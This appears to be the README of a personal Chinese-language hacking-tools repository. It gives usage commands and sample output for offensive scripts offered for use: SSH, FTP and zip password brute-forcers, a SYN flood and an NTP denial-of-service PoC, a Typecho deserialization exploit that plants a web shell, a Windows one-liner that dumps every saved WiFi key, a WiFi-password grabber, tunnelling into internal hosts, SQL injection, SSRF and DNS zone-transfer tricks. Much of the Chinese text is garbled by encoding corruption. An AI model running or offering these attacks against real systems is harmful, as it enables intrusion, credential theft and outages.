Hacking Tools Demo

English version(英文版本)

Wechat Subscibe (�?定时分享一些有�?�?的东西)

Menu

远程命令执行

Remote Command/Code Execute 简称 RCE 

比如这篇文章：Gogs远程命令执行�?洞分�? （https://www.anquanke.com/post/id/163575）
开�?�者在处�?�file型session时未处�?��?�险字符造�?目录穿越。
攻击者通过目录穿越，伪造的管�?�员session，�?功伪造管�?�员登陆,�?�利用Git hook实现任�?远程命令执行。

这�?�是Gogs项目，因为关注的人多，所以�?被披露，实际场景中�?�能还有很多框架存在类似或者相似问题。

比如2018年我在Beego中也�?�现了类似�?洞的存在，并�?�作者�??交了一个�?洞修�?的pr (https://github.com/astaxie/beego/pull/3383)
作者也很快将修�?代�?�?�并到了主分支。

但在这之间，�?�一�?安全爱好者通过我�??交的Beego框架的�?洞pr�?�现了�?开�?在线文档管�?�系统中存在�?洞，
�?�以登录未授�?�用户账�?�。（https://github.com/lifei6671/mindoc/issues/384）

而主�?原因在于这个开�?在线文档管�?�系统使用了Beego框架，而当时的Beego框架版本中还存在类似�?洞并没有修�?。

在web领域的框架尤其PHP最多，这其中肯定也有很多问题，以�?给国产�?框架�??过一个，当时WooYun还没有关闭，
而现在WooYun所代表的白帽文化�?�能永远消失在互�?�网的浪潮中。

有些问题其实是一个�?的安全问题，其本身�?�能并没有什么特别高深的技术�?��?，但所有�?的安全问题组�?�起�?�就�?�以�?��?一个大的安全问题。

类似问题有很多，主�?是�?�焦开�?�的往往关注安全很少，�?�有关注的人足够多了或者有�?于分享的人或者有推动这些被公开的动力，
那些潜在的�?洞�?有�?�能被�?�?披露。

attackWiFi.py 一个获�?�wifi密�?的工具

破解原�?�：
	破解wifi万能钥匙的接�?��??议，�?�抓包暴力破解，wifi万能钥匙的�?务端存储了大�?的wifi密�?相关信�?�
	通过�?�接�?��??供ssid和bssid信�?�，获�?�真实的wifi密�?
	这里�?感谢zke1ev3n逆�?�了wifi万能钥匙的安�?�客户端
	本脚本完善了破解程�?，增加了容错机制，获得的密�?在response中其实是urlencode的，本脚本也增加了decode解�?
查看帮助
➜  Hacking git:(master) ✗ py attackWiFi.py -h
Usage: use:
	--ssid <wifi ssid> --bssid <wifi bssid>
	Example: python attackWiFi.py --ssid ssid --bssid bssid

Options:
  -h, --help          show this help message and exit
  --ssid=WIFI_SSID    the wifi ssid info
  --bssid=WIFI_BSSID  the wifi bssid info

第一步是�?获得wifi的ssid和bssid信�?�，我演示的环境是Mac环境，其他环境请自行寻找下获�?�ssid和bssid的工具
Mac环境：
	执行：airport -s 获�?�所有wifi相关信�?�，这里部分信�?�进行了打�?：
	Mac下默认airport -s 是�?行的，因为我在执行之�?建过一个软链接：
	ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
	其他�?作系统获�?�方�?�?�自行Google

上一步获得了ssid和bssid信�?�
执行获�?�密�?：
python attackWiFi.py --ssid xxx --bssid ****
xxx 表示wifi的�??称：比如wifi�??�?�：home
**** 表示wifi的bssid信�?�：比如 17:71:94:14:84:0d (�?便写的)
那么获�?�密�?就是：
python attackWiFi.py --ssid home --bssid 17:71:94:14:84:0d
�?功了会显示password is: xxxxxxx
也有�?�能会失败，貌似�?务端是有check的，�?作多了，会获�?�失败，这个时候�?�以�?�一个网络环境测试，或者�?�一个wifi测试

图解https

网上大部分关于https的讲解�?��?�?�样，也�?易于�?�解。于是自己总结画了个图，如有错误欢迎批评指正

1.[server] 生�?�?对的公钥和�?钥，Pub,Pri
2.[server] �?务器将“Pub�?传给客户端
3.[Client] 生�?对称秘钥("key2"),然�?�用key2加密信�?�
4.[Client] 使用“Pub�?加密“key2�?。因为�?�有�?务器知�?�“Pri�?,所以“key2�?是安全的
5.[Client] send(加密�?�的数�?�)和(加密的�?�的key2)给�?务器
6.[Server] 用�?钥“Pri�?解密这个result_two，拿到“key2�?
7.[Server]用“key2�?解密加密�?�的数�?�result_one。数�?�安全的到达�?�了�?务器。

总结:解密result_one用的key2采用对称加密,而公钥和�?钥的生�?则采用�?�对称加密,
所以一个完整的https�?程应该是既包�?�了对称加密也包�?�了�?�对称加密.

图解HSTS

HSTS一定是安全的的�?�？助你深入�?�解HSTS的图。

TcpPortForward.py 端�?�转�?�tool

使用场景:

一：
A�?务器在内网，公网无法直接访问这�?��?务器，但是A�?务器�?�以�?�网访问公网的B�?务器（�?�设IP为222.2.2.2）。
我们也�?�以访问公网的B�?务器。我们的目标是访问A�?务器的22端�?�。那么�?�以这样：

1. 在B�?务器上�?行：
./TcpPortForward.py l:10001 l:10002
表示在本地监�?�了10001与10002两个端�?�，这样，这两个端�?�就�?�以互相传输数�?�了。

2. 在A�?务器上�?行：
./TcpPortForward.py c:localhost:22 c:222.2.2.2:10001
表示连接本地的22端�?�与B�?务器的10001端�?�，这两个端�?�也�?�以互相传输数�?�了。

3. 然�?�我们就�?�以这样�?�访问A�?务器的22端�?�了：
ssh 222.2.2.2 -p 10002
原�?�很简�?�，这个命令执行�?�，B�?务器的10002端�?�接收到的任何数�?�都会传给10001端�?�，此时，A�?务器是连接了B�?务器的10001端�?�的，
数�?�就会传给A�?务器，最终进入A�?务器的22端�?�。

二：
�?用更多举例了，TcpPortForward.py的l与c两个�?�数�?�以进行�?�活的两两组�?�，多�?��?务器之间�?��?�?�明白数�?��?方�?�，那么就能满足很多场景的需求。

collect from phithon

typeEcho get Shell , typeEcho�??�?列化�?洞利用

typeEchoShell.php 为生�?shell的内容，�?过base64�?��?列化的值，�?�用于typeEchoShell.py中的cookie一项
typeEchoShell.py  获�?�目标站点shell

例：python typeEchoShell.py -u http://www.xxx.com

若�?自定义shell内容，�?�更改typeEchoShell.php，自定义shell内容

获�?�所有连接过的wifi密�?(Win平�?�)

需�?管�?�员�?��?
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do  @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

zipattack.py | zak.py zip加密文件暴力破解

帮助说明：  python zipattack.py -h

测试：
zip test.zip *.gif -e 

进行暴力破解：
python zipattack.py -f test.zip -d password.txt


第二个脚本：zak.py 是无�?穷举
python zak.py -h 
Usage: usage	 -f <zipfile> -t <type> -l <length> or -h get help

Options:
  -h, --help  show this help message and exit
  -f ZNAME    specifyzip file
  -t TNAME    specify type(num|a|A|aA|anum|numa|Anum|aAnum)
  -l LENGTH   specify length,default=8
例：
	python zak.py -f test.zip -t num -l 12
	表示以数字类型，长度最长为12的密�?枚举test.zip文件

createDict.py 生�?一个简�?�的密�?破解字典

python createDict.py 

按ctrl+c �?�止生�?

PortScan.py 多线程端�?�扫�??器

More Help: PortScan.py -h

测试:
	python PortScan.py -H www.baidu.com -p 80 443 110
	➜  py python PortScan.py -H www.baidu.com -p 80 443 110 
		[+] Scan Results for: 119.75.218.70
		Scanning port 443
		Scanning port 110
		Scanning port 80
		[+]443/tcp open
		[+] HTTP/1.1 302 Moved Temporarily
		Server: bfe/1.0.8.18
		Date: Sun, 06 Nov 2016 08:43:40 GMT
		Content-T
		[-]110/tcp closed
		[-]80/tcp closed
	Also, You can local test , The python script support domain or ip mode
	Example:
		python PortScan.py -H 127.0.0.1 -p 80

sshAttack.py 多线程ssh密�?暴力破解

测试：
	➜  py python sshAttack.py -h                                                    
		Usage: -H <target host> -u <user> -f <password list>

		Options:
		  -h, --help     show this help message and exit
		  -H TGTHOST     specify target host
		  -f PASSWDFILE  specify password file
		  -u USER        specify the user
		  -c COUNT       specify the max ssh connect count , default 5
	
	py python sshAttack.py -H 192.168.2.201 -u test -f /Users/lock/1.txt -c 20
	-c 用户测试指定ssh链接数，具体根�?�ssh config 文件判断

例：
➜  py python sshAttack.py -H 192.168.1.100 -u root -f password.md -c 20
		[-] Testing: 1111
		[-] Testing: 2222
		[-] Testing: 3333
		[-] Testing: 111111
		[-] Testing: 123123
		[-] Testing: 123456
		[+] Good , Key Found: 123456

ftpAttack.py 多线程ftp密�?暴力破解

测试：
➜  py python ftpAttack.py -h
	Usage: -H <target host> -f <password list>

	Options:
	  -h, --help     show this help message and exit
	  -H TGTHOST     specify target host
	  -f PASSWDFILE  specify password file,like username:password format file
	  -d DELAY       attack time delay set default 1s

➜  py python ftpAttack.py -H 127.0.0.1 -f userpass.md -d 1

	[-] 127.0.0.1 FTP Anonymous Logon Failed.
	[+] Trying: root/aaa

	[-] Could not brute force FTP credentials.

	[+] Trying: lock/mmm

	[-] Could not brute force FTP credentials.
	[+] Trying: alice/123


	[-] Could not brute force FTP credentials.

	The default test delay time is 0s , test default account is anonymous , if success, will show user name and password.
	userpass.md is username and password file,the file format like below:
		root:123
		hello:456
		alice:789
		test:12345

synFlood.py 一个简�?�的 TCP SYN 洪水攻击 python版

More Detail:
python synFlood.py -h
1,用 Scapy 简�?�的�?制一个 TCP SYN 洪水攻击，将制作一些 IP 数�?�包,  TCP 513 目标端�?�。
2,�?行攻击�?��? TCP SYN 数�?�包耗尽目标主机资�?，填满它的连接队列，基本瘫 痪目标�?��? TCP �?置包的能力。
3,netstat -an 大�?的�?�链接状�? SYN_RECV

�?�能需�?的�?赖：
brew install --with-python libdnet

pip install scapy
pip install pcapy
pip install pydumbnet

执行效果:
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
....

ntpDenialService.py 一个使ntp拒�?�?务的poc代�?

构造一个特殊的数�?�包，ntpd没有默认开�?�trap�?务，如果trap被开�?�，攻击者就能通过特别构造的数�?�包导致空指针引�?ntpd崩溃，进而导致�?务器拒�?�?务。
测试：
监�?�本地udp 1111 端�?�
➜  ~ nc -l -u 0 1111

执行：
➜  Hacking git:(master) ✗ python ntpDenialService.py 127.0.0.1 1111
[-] Sending payload to 127.0.0.1:1111 ...
[+] Done!

➜  ~ nc -l -u 0 1111

6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP

接�?�到这个特殊的数�?�包，ntpd崩溃，形�?拒�?�?务

分享一个SQL注入的技巧

审计开�?框架/cms的时候�?�能会�?�到一些有�?�?的注入�?洞
当以pdo的方�?连接mysql，也就是说�?�以多语�?�执行的时候
然�?�，�?�考如下：

python:
import binascii
s='select * from x limit 1;'

print binascii.b2a_hex(s)
# 获得16进制数�?�，73656c656374202a2066726f6d2078206c696d697420313b

mysql -uroot
set @a:=0x73656c656374202a2066726f6d2078206c696d697420313b;

prepare s from @a;

execute s;

mysql root@localhost:test> execute s;
+------+----------+-------+
|   id |   is_reg |   pid |
|------+----------+-------|
|    1 |        1 |     0 |
+------+----------+-------+
1 row in set
Time: 0.002s

attackSmb/win10.py 一个SMB�?洞的Poc代�?

此�?洞主�?影�?Windows Server 2012/2016�?Win8/8.1以�?�Win10系统。
攻击者�?�以模拟�?一个SMB�?务器，诱使客户端�?�起SMB请求�?�触�?��?洞。
攻击者也�?�以通过中间人方�?“毒化�?SMB回应，�?�入�?��?的SMB回�?实现拒�?�?务或控制�?�害系统。

badtunnel-poc.rb badtunnel 跨网段劫�?

detail:
badtunnel-poc.rb

sqlInjetct.py 一个延时注入的验�?

根�?�返回的时间差�?�猜测注入的结果是�?�正确(无视代�?很烂)
帮助：
➜  Hacking git:(master) ✗ py sqlInjetct.py
-----Usage:-----

Example:
python sqlInject.py -u http://xxx.xxx.com/id=123

关于SSRF�?洞 与 DNS域传�?�?洞

SSRF放大以�?�还是�??分�?�险的，当利用SSRF刺探内网的时候，结�?�dict伪�??议�?利用ftp�??议刺探�?个ip是�?�存活.
一般情况下如果�?�以在�?短时间内得到response那么基本�?�以判定该ip存活，�??之�?存在该ip。
这个技巧也是收集过�?�的，至于为什么应该是和ftp�??议本身有关?
获得一幅内网�?图SSRF是一个�?错的选择。
如何判断SSRF：
1,SSRF是由�?务端�?�起的请求，因此在加载图片的时候，是由�?务端�?�起的。
2,在我们本地�?览器的请求中就�?应该存在图片的请求，如果抓包�?�以立�?�看到效果。

DNS域传�?�?洞：
主域�?务器A，备域�?务器B,
A，B之间需�?备份相关的域�??，ip对应信�?�,
原则上�?�有B�?�以去�?�步A信�?�到自己的数�?�库中。但是由于�?置错误,
导致任�?客户端�?�主域�?�起请求,主域都会把相关信�?�返回给客户端,内部网络�?图被轻�?�泄露。

dig soa xxx.com
得到ANSWER SECTION:�?�设为：
ns3.dnsv4.com

查看是�?�有域传�?返回：
dig axfr xxx.com @ns3.dnsv4.com
有返回就表示�?洞存在

使用Python构造一个fastcgi�??议请求内容�?��?给php-fpm , Nginx（IIS7）解�?�?洞原�?�

查看帮助：
python fpm.py -h 

这篇文章写的�?错，于是收集了过�?�：
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html

简述如下：
Nginx和IIS7曾�?出现过一个PHP相关的解�?�?洞（测试环境https://github.com/phith0n/vulhub/tree/master/nginx_parsing_vulnerability）.
该�?洞现象是，在用户访问http://127.0.0.1/favicon.ico/.php时，访问到的文件是favicon.ico，但�?�按照.php�?�缀解�?了。

用户请求http://127.0.0.1/favicon.ico/.php，nginx将会�?��?如下环境�?��?到fpm里：

{
    ...
    'SCRIPT_FILENAME': '/var/www/html/favicon.ico/.php',
    'SCRIPT_NAME': '/favicon.ico/.php',
    'REQUEST_URI': '/favicon.ico/.php',
    'DOCUMENT_ROOT': '/var/www/html',
    ...
}
正常�?�说:
SCRIPT_FILENAME的值是一个�?存在的文件/var/www/html/favicon.ico/.php，
是PHP设置中的一个选项fix_pathinfo导致了这个�?洞。
PHP为了支�?Path Info模�?而创造了fix_pathinfo，在这个选项被打开的情况下，
fpm会判断SCRIPT_FILENAME是�?�存在，如果�?存在则去掉最�?�一个/�?�以�?�的所有内容，
�?次判断文件是�?�存在，往次循环，直到文件存在。

所以，第一次fpm�?�现/var/www/html/favicon.ico/.php�?存在，则去掉/.php，�?判断/var/www/html/favicon.ico是�?�存在。
显然这个文件是存在的，于是被作为PHP文件执行，导致解�?�?洞。

正确的解决方法有两�?：
一，在Nginx端使用fastcgi_split_path_info将path info信�?�去除�?�，用tryfiles判断文件是�?�存在；
二，借助PHP-FPM的security.limit_extensions�?置项，�?��?其他�?�缀文件被解�?。

morse.py 摩斯密�?加解密

摩斯密�?是由美国的三缪摩斯�?�明的一套加密算法，是一�?断断续续的信�?�代�?。
加密：
➜  ~ python morse.py -e lock
.-.. --- -.-. -.-

解密:
➜  ~ python morse.py -d '.-.. --- -.-. -.-'
lock
➜  ~

查看帮助:
➜  ~ python morse.py
usage	 -e|-d msg or -h get help

crawl.py 轻�?级图片爬虫

修改crawl.py中:
URL = "https://www.xxx.top" # �?爬�?�的网站

# 爬�?�的URL域�??范围
URL_RULE = [
        'https://www.xxx.top',
        'https://xxx.top',
        'http://www.xxx.top',
        'http://xxx.top'
]

执行爬虫：
python crawl.py 

wooyun_index.py 1000个PHP代�?审计案例(2016.7以�?乌云公开�?洞)---增加索引

git clone git@github.com:Xyntax/1000php.git
默认是没有索引的，所以查看�?洞�??分�?方便
1，cd 1000php
2，执行下载我的脚本：wget https://raw.githubusercontent.com/LockGit/Hacking/master/wooyun_index.py -O wooyun_index.py
3，执行：mkdir css && mkdir js 
4，执行：wget https://github.com/LockGit/Hacking/raw/master/res/style.css -O style.css -P css/
5，执行：wget https://github.com/LockGit/Hacking/raw/master/res/jquery-1.4.2.min.js -O jquery-1.4.2.min.js -P js/
6，执行：python wooyun_index.py 会生�?�?洞索引列表，此时会生�?index.html文件，打开这个文件�?��?�
效果如下：

proxy_crawl/get_proxy.py | ocr_img.py �??爬虫代�?��?务器抓�?�实现方�?

访问：http://www.goubanjia.com/free/index.shtml �?�看到该网站�??供了很多代�?��?务器
但是核心的代�?�ip信�?�采用了�??爬虫策略
�?�以看下page结构如下�?�图片�??述,写过爬虫的�?�学知�?�这是有�?混淆页�?�结构,让爬虫无法抓�?�到正确信�?�，从而在一定程度上起到�?护作用。
写了2个py文件进行了一个�?测试，是一个简�?�实现,代�?在仓库proxy_crawl目录下：
没有什么高深的技术�?��?
核心原�?�是通过selenium唤醒chrome打开待抓�?�页�?�，然�?�程�?自动对�?一页内容进行截图，�?存在proxy_crawl/img下�?�(如下图)
之�?�通过pytesseract对抓�?�到的图片进行识别，直接无视�?端页�?�的混淆
pytesseract模�?��?�以�?试下，国外还有大神用js实现了这个模�?�，支�?62�?语言�?览器端的识别，当然，也是需�?模型数�?�支�?的
一般还�?�以识别一下简�?�的验�?�?，但是�?�?�的�?行，太过�?�?�的�?�能需�?比如tensorflow+cnn，网上也有案例
清洗数�?�并记录到proxy_crawl/proxy.md文件中
环境：python 2.7.14 , 模�?��?�以自己看下 py 文件代�?，pip install 下所用到的模�?�
执行：python get_proxy.py 抓�?�图片
执行：python ocr_img.py 代�?�数�?�识别

验�?�?识别v1+HTTP�??议Range特性分�?

Google �?�索 tesseract.js 字符识别

总结文档：+ 验�?�?识别v1+HTTP�??议Range特性分�?.pdf

HTTP�??议Range特性分�?(多线程文件下载器实现):

• 多线程文件下载器实现

基于机器学习(TensorFlow)的�?�?�验�?�?识别

�?用机器学习算法时，如果�?�?�解实现原�?�，先套接�?�先实现功能，识别算法是通用的。一般处�?��?�?�验�?�?，有�?�?�的处�?�策略。
分类算法举例：（具体：https://github.com/LockGit/Py）
    01，knn   (k点邻近算法）
    02，svm（支�?�?��?机，�??分�?�?�）
    ...
SVM算法相比较KNN算法�?�说，原�?�上�?�?�?��?�?�的多，SVM算法基本�?想是把数�?�转化为点，
通过把点映射到n维空间上，通过n-1维的超平�?�切割，找到最佳切割超平�?�，
通过判断点在超平�?�的哪一边，�?�判断点属于哪一类字符。

基于机器学习的验�?�?识别则是把�?识别的对象当�?�一个整体。
选择0-9纯数字，CNN网络4*10个输出，学习时间：70分钟，模型准确率：99%
验�?�?预测截图:

总结文档：+ 基于机器学习(TensorFlow)的�?�?�验�?�?识别.pdf